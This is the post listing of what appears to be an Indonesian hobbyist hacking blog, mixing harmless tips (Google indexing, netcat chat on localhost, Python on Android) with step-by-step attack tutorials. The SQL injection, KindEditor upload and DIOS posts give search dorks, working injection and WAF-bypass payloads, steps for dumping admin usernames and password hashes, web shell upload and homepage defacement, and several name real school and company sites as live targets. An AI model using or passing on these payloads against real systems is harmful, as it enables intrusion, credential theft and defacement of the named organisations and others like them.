Friday, December 27, 2024

SQL INJECTION UNION BASED

Komentar







Ok welcome guys kali ini saya akan share tentang sql injection union based

SQL INJECTION adalah adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQLatau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (wikipedia)

Sql Injection di klarifaikasi kan berdasarkan value parameternya, yaitu


1. integer based sql injection
2. string based sql injection


kita bahas yang pertama dahulu yaitu integer.

web yang berjenis integer based tidak dapat di balancing (--+-)
jadi kita harus menghilangkan single quotenya dahulu  (')

contoh web integer

http://zixem.altervista.org/SQLi/level1.php?id=1'--+






dan untuk string baseed yaitu sebaliknya :)
pham kan? ezzz juga :v


ok lanjut sekarang kita inject webnya :)

kita ketikkan order+by smpai ketemu eror

http://zixem.altervista.org/SQLi/level1.php?id=1+order+by+1--+ no eror
http://zixem.altervista.org/SQLi/level1.php?id=1+order+by+2--+ no eror
http://zixem.altervista.org/SQLi/level1.php?id=1+order+by+3--+ no eror
http://zixem.altervista.org/SQLi/level1.php?id=1+order+by+4--+ EROR






kita ketahui columnnya ada 3,
karna waktu kita order by ke 4 eror.

next lanjut kita union select

http://zixem.altervista.org/SQLi/level1.php?id=1+union+select+1,2,3--+

jika tidak angka vulnnya tidak muncul maka tambahkan (-) sebelum angka, seperti ini


http://zixem.altervista.org/SQLi/level1.php?id=-1+union+select+1,2,3--+


kita lihat angka vuulnya yaitu 2






sekarang  kita print  version database dan nick

seperti ini

http://zixem.altervista.org/SQLi/level1.php?id=-1+union+select+1,concat(0x3c666f6e7420636f6c6f723d27726564273e,0x34465a344e,0x3c62723e,@@version,0x3c62723e,database(),0x3c2f666f6e743e),3--+




Baca selengkapnya

Wednesday, July 11, 2018

Cara agar artikel cepat terindex di google

Komentar
cara agar artikel cepat terindex di google











assalamualaikum :v

welcome to my blog, ok guys kali isi saya akan share cara agar artikel bisa terindex di google.

pasti tentu saja kalian para blogger sangat sangat mengimpikan artikelnya ada di page
pencarian di mesin pencari google ya kan? sama saya juga :v

ok, google merupakan mesin searching yang sangat terkenal, sebernaranya masih banyak mesin
pencarian yang lain tapi karna google lebih terkenal maka kita akan belajar cara submit artikel
di google dengan google web master.

google web master merupakan alat yang di sediakan oleh google
yang salah satunya yaitu membantu kita untuk menyubmit artikel kita agar terindex di google .



ok  langsung aja step pertama siapakan artikel anda yang akan di submit di google

lalu menuju google web master kalian bisa klik DISINI

jangan lupa untuk logon gmail dulu yak :v



setelah anda buka maka tampilannya akan seperti ini.









silahakan anda masukan link artikel anda di input text tersebut.

setelah itu klik I'AM NOT ROBOT


setelelah terceklis klik  SUBMITE REQUEST
jika sukses maka akan muncul tulisan

"Your request has been received and will be processed shortly.

yak seperti itu kira kira tulisannny :v




maka artikel anda akan di proses agar cepat terindex di google.

"untuk keamanan cukup satu kali submit saja. jangan terlalu berlebihan.

jika berlebihan maka google bisa mengnggap spam.
mungkin anda berpikir banyak menyubmit maka akan cepat terindex yakan :v
namun jika hasilnya tidak seperti apa yang kita pikirkan, kan sakit :v
bisa bisa ter banned :v'"


namun itu hanya pemikiran saya saja :v
jika anda lebih mengerti tentang google web master silahkan saja :)


ok saya saya rasa cukup sampai disini saja.
untuk next artikel kita akan belajar cara submit artikel di bing.com

namun lain kali saja yak kalo sempat :v


ok thanks telah berkunjunga :)

Baca selengkapnya

Sunday, July 8, 2018

Cara deface poc kindeditor

Komentar

CARA DEFACE POC KINDEDITOR









assalamualaikum
welcome my blog ;V
kali ini saya bakalan share tutorial cara deface poc kindeditor.
poc ini adlah poc yanag sangat gampang lo ya :v just upload html :v

saya berinisiatif buat artikel ini karna melihat di grup defacer bnyk yang bertanya bagaimana cara upload script defacenya.

ok langsung aja dork seperti di bawah



inurl:examples/uploadbutton.html
inurl:kindeditor

dork di gugel
pilih salah satunya









untuk web saya ini
http://www.mtcbus.com.tw/Public/Js/kindeditor/examples/uploadbutton.html





lalu klik upload dan pilih script deface kalian.

jika kalian belum punya bisa kalian gunakan script saya walaupunh jelek :v
silahkan edit nick dan nama teamnya klik DISINI
rename jadi html






setelah itu salin link di form tadi dan pastekan di blakang nama webnya seperti ini


http://www.mtcbus.com.tw/Public/Js/kindeditor/attached/file/20180709/20180709052020_34120.html





klik enter,,, :v




gampang kan XD
ok saya rasa cukup sampai dsisi aja yak :v

ok tq telah berkunjung :)
Baca selengkapnya

Friday, July 6, 2018

Cara deface poc sql lokomedia

3 Komentar
cara deface poc sql lokomedia









ok welcome guys kali ini saya akan share tutor cara deface poc sql lokomedia

tehnik ini hampir sama seperti sql injection yg sebelmnya saya tulis :V

namun tuor ini lebih simple yak :v

langsung aja deh

dork:

 inurl:statis-19-beasiswa.html
 inurl:statis-1/profil.html
- inurl:statis-2/visi-dan-misi.html 


exploit:

'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+

1. pertama sperti biasa dorking dahulu,,,


lalu pilihsalah satu webnya.


dan masukan exploitnya di belakang angka.

seperti ini


http://www.sman8malang.sch.id/statis-1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+-pengantar.html



setelah itu silahkan anda tekan CTRL+U atau misalkan anda menggunakan hp
bisa mengetikan view-source: seblum http






lihat di sekitar atas ada kode md5nya kalian bisa hash di https://hashkiller.co.uk/md5-decrypter.aspx



tinggal mencari admin login.
kalian bisa coba coba seperti ini


/administrator.php
/admin.php
/redaktur.php
/adminweb.php


keknya dah cukup ampe sini aja.
entar malah ngajarin yang enggak enggka lagi :v


ok thanks telah mampir :v

live target


http://www.sman8malang.sch.id/statis-1-pengantar.html



Baca selengkapnya

Wednesday, June 27, 2018

Cara deface poc sqli DIOS (Dump In One Shot)

Komentar
Cara deface poc sqli Dios







Ok guys balik lg ame ane,, stlah lama kgak pernah posting lg di blog ini karna sibuk :v
,,,,,wkwkwkkw

DAh kgak usan bnyk bacot,
langsung aj...


kali ini saya cuman mw share saja eak,, :v soalnya males mo nulis wkwkwk,,,,

sumber asli ada di paling bwah artikel.

langkah awal seperti biasa,, dorking dulu yak :v

dork:

about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
sisanya DISINI


www.situs.co.il/advertiser_view.php?id=77
step awlanya untuk mengetahui vuln atau tidaknya kalian besa memberikan tanda petik di akhir angka seperti ini

www.situs.co.il/advertiser_view.php?id=77'

ciri-ciri vuln tidak harus nongol tulisan eror.
bisa saja ada kata yg hilang,gambar ato sebagaianya,


untuk lankah pertama kita gunaka

order+by+1--+
order+by+2--+
order+by+3--+
dst :v

Lanjut kita bermain dengan order+by+1-- dan seterusnya sampai menemukan pesan error.



Disini w mendapatkan errornya di angka order+by+10-- berarti jumlah columnnya ada 9.


Ditarget gw ga ada error mysql blablabla atau error sqli yang lainnya, tapi disini errornya datanya hilang atau artikelnya kosong di bagian bawah about.(lihat gambar diatas)

Oke lanjut ketutorial berikutnya, masukan union select.
Selengkapnya seperti ini,

union+select+1,2,3,4 dst--+
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,9--


Dan mari kita lihat(gambar di atas), dibagian bawah about keluar angka magicknya atau biasa menyebutnya dengan angka ajaib
Kalo ditutorial kemarin kita harus memasukan group_concat dll kali ini enggak, tinggal kita masukan code DIOS nya saja.
Disini w milih angka 9 aja dan berikut ini code DIOS nya,
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)


(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
FOR WAF:
(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)

Untuk perintah lengkapnya kek gini gaes,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)--


Nah lihat itu(gambar diatas), semua column dan beserta table sudah muncul.
Yang kiri itu column kalo yang kanan itu tablenya. Tinggal kita dump deh gaes hehe.

Lanjut ke tutorial ngedumpnya ,cari nama admin atau apa yang sekiranya berbau admin.
Disini target gw nama column admin nya adalah admin dan untuk nama tablenya adalah USER_NAME dan PASSWORD bisa lihat digambar bawah ini,


Berarti kita perintahnya untuk memasukan ke code dios nya jadi gini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--
atau bisa juga seperti ini

www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,concat(,USER_NAME,0x3a,PASSWORD)+from+admin--+






Dan bummmm lihat(gambar diatas), Ternyata kita berhasil ngedump username dan passwordnya.

Setelah itu tinggal cari tempat admin loginya, tapi disini gw udah tau tempat admin loginya jadi tinggal login.

Sekarang cari tempat buat upload shell, lihat gambar dibawah ini,



Setelah menemukan tempat buat upload shell, sekarang saatnya upload shell kalian.
Kalo belum punya shell kalian bisa cari dipostingan gw ada kok.
Dan disini gw udah berhasil uploadnya, liat gambar dibawah ini,


Untuk cara mengaksesnya shellnya kalian tinggal klik kanan lalu copy url dibrowser,
Untuk diandroid tinggal klik dan tahan pada shell kalian yang udah diupload tadi lalu salin url gambar,


Sekarang tinggal paste url shell tadi dibrowser dan enter, nanti shell kalian bakalan muncul.


Nah step terakhir, cari directory publick_html dan upload script deface kalian disitu dengan extensi index.php ini untuk ngedeface halaman utama website.

Kalo hanya mau nitip file saja, kalian upload script deface selain index.php bisa dengan nama test.php, test.html, dll sesuai keinginan kalian aja.



Seperti yg saya bilang sebelumnya artikel ini bukan asli tulisan saya, saya hanya menambahkan apa yang kurang saja, :)
saya hanya meng share, untuk sumber asli bisa kalian klik link di bawah ini.

touch me senpai

ok sekian terimakasih,
Baca selengkapnya

Sunday, May 27, 2018

CARA CHAT DENGAN TERMINAL EMULATOR

Komentar
CARA CHAT DI TERMINAL EMULATOR








Assalamualiakum fans :v
hyak puasa-puasa gini + siang yang panas gabut yak :v coba aja kalo ada es buah es cincau uuuhk.... subarashi :v (loh kok curhat :v )

Ok nih tadi banyak yang minta tutorial cara CHAT di TERMINAL EMULATOR.
 Ok nih ane buatin yak.. langsung aj deh..

Siapain dulu bahan-bahannya

1.TERMINAL EMULATOR
2.BUSYBOX
3.face gans kayak saya :v
4.harus jones -_-


Ok step yang pertama silahkan install dulu aplikasi di atas yak..

Setelah di install buka 2 tab di Terminal emulator.
Tab yang pertama silahkan ketikkan seperti ini

su 
nc -lvp 6969



*penjelasannya:
Su di gunakan untuk masuk ke mode rootnya.
Sedangakan
nc -lvp 6969
nc adalah nama package yg terinstall melalui busybox tadi nah optionnya yaitu -lvp di gunakan untuk me LISTEN sedangkan 6969 itu adalah portnya. Port bisa di ganti menjadi 444 13337 13338 dll lah :v

Setelah itu buka tab yang ke 2 ketikkan perintah seperti ini

su
nc 127.0.0.1 6969



Dan tunggu beberapa minggu :v
Tunggu  sadja beberapa detik.. kali berhasil ada tulisa seperti ini

u0_a122@android:/ $ su
u0_a122@android:/ # nc -lvp 6969
listening on [::]:6969 ...
connect to [::ffff:127.0.0.1]:6969 from [::ffff:127.0.0.1]:37595 ([::ffff:127.0.0.1]:37595)









Nah tinggal kalian ketikkan kata-kata apa yang ingin anda katakan :v


Oh ya kalian juga bisa chat dengan teman jauh kalian namun harus tau ip teman kalian.. tapi kadang sangat sulit untuk memastiin ip karna kadang kadang ekor ip bisa berubah kapan saja. Jadi saya saranin ente pake akun ssh sadja yg sudah pasti ipnya berapa.

Oh ya chat dengan nc (NETCAT) bisa di lakukan dengan
TE  = TERMUX
TE =CONNECTBOT
TE =JUICESSH
Namun untuk connectbot dan juicessh kalian harus login dulu dengan akun ssh/vps yak..
Dan ini sudah saya tes kepada teman-teman saya yang tinggal di mars :v dan ternyata work...


Ok kayaknya segitu sadja pembahasan TE lain kali bakalan saya update lagi deh tentang TE . Kbtulan juga hp saya gk sup TERMUX jadi saya make TE :v

Ok dah sampai jumpa lagi besok. (Besok kapan?) Yah besok besok besoknya lagi :v

Wassalam :-)
Baca selengkapnya

Wednesday, May 23, 2018

Cara install PYTHON di TERMINAL EMULATOR

Komentar 
    Cara install python di Terminal emulator






































          assalamualaikum guys :v


balik lagi ama mimin yg gans neh :v
yak kali ini mimin bakalan share tutor install PYTHON di TERMINAL EMULATOR (ROOT)

sebelum itu kalin harus tau apa ke gunaan terminal emulator. entar udh pasang terminal emulator tapi gak tau buat apa :v kan lol :v
makanya budayakan baca sebelum nganu -_-!

 Daripada kelamaan langsung aj deh (puasa-puasa haus gak kuat ngetik banyak-banyak :v)
 
silahkan kalian cari bahannya dulu

1.GAE PROXY (playstore bejibun)
2.TERMINAL EMULATOR (di playstore lumrah)
3.HP harus mahal :v (kidding)
4.ROOT EXPLORER

1. Yak peetama silahkan install gaeproxsy kalian


 






truz kalian buka apknya tunggu 0,0001 detik :v ntr ada penginstalan tpi cmn sebentar kok :v

2. setelah itu kalian buka aplikasi root explorer kalin teruz masuk ke 

/data/data/org.gaeproxy

silahkan kalian salin file bernama Yoga :v kidding :v

copy file  PYTHON-CL







3.pindahkan ke 
/System/bin
silahkan rename sadja sesuka kalian biar gampang manggilnya.
kalo punya saya bernama  ZAN














4.Setelah itu silahkan anda rubah permissionnya menjadi 0755
caranya tinggal di tahan lama filenya teruz klik permission.





5.setelah itu kalian buka aplikasi TE kalian
ketikkan
su 
zan (silahkan cocokan dengan nama yg anda rubah tadi)








6. dan jreng-jreng-jreng :v

gampang kan :v
orang cuman mindah-mindah doank juga :v
ok mimin rasa segitu aj :v jika kalin kesulitan silahkan comment di bawah yak :v
jangan lupa di share biar makin update saya :v
ok sekian 
wassalamualiakum :)














Baca selengkapnya










        

      










Subscribe to:
Posts (Atom)